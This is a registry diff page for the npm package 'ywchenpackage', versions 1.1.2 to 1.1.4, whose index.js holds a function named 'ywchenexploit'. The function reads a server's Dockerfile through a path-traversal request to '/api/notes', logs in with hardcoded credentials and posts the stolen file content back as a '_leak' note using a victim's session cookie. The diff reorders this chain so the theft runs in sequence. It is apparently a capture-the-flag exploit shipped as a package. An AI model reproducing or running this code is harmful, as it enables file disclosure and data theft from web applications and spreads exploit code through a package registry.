ywchenpackage 1.1.2 → 1.1.4

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/index.js +26 -24
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -1,7 +1,6 @@
1
1
  function ywchenexploit(cookie) {
2
2
  let stolenurl = "/api/notes?id=/proc/self/cwd/Dockerfile";
3
3
  let c2path = "/api/notes";
4
- var stolen;
5
4
  fetch(stolenurl)
6
5
  .then(
7
6
  (response) => {
@@ -9,29 +8,32 @@ function ywchenexploit(cookie) {
9
8
  }
10
9
  ).then(
11
10
  (response) => {
12
- stolen = response[0];
13
- stolen.author = "aaaa";
14
- });
11
+ let stolen = response;
12
+ fetch(
13
+ "/login",
14
+ {
15
+ method: "POST",
16
+ headers: {
17
+ "content-type": "application/x-www-form-urlencoded"
18
+ },
19
+ body: "username=ywchen&password=ywchen"
20
+ }
21
+ ).then(
22
+ (response) => {
23
+ fetch(
24
+ c2path, {
25
+ method: "POST",
26
+ headers: {
27
+ "content-type": "application/json",
28
+ "cookie": "session="+cookie
29
+ },
30
+ body: JSON.stringify({"title":stolen.title+"_leak","content":stolen.content})
31
+ }
32
+ );
33
+ }
34
+ );
35
+ }
36
+ );
15
37
 
16
- fetch(
17
- "/login", {
18
- method: "POST",
19
- headers: {
20
- "content-type": "application/x-www-form-urlencoded"
21
- },
22
- body: "username=ywchen&password=ywchen"
23
- }).then(
24
- (response) => {
25
- fetch(
26
- c2path, {
27
- method: "POST",
28
- headers: {
29
- "content-type": "application/json",
30
- "cookie": "session="+cookie
31
- },
32
- body: JSON.stringify({"title":stolen.title+"_leak","content":stolen.content})
33
- }
34
- );
35
- });
36
38
  return "hello NPM"
37
39
  }
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "ywchenpackage",
3
- "version": "1.1.2",
3
+ "version": "1.1.4",
4
4
  "description": "",
5
5
  "main": "index.js",
6
6
  "scripts": {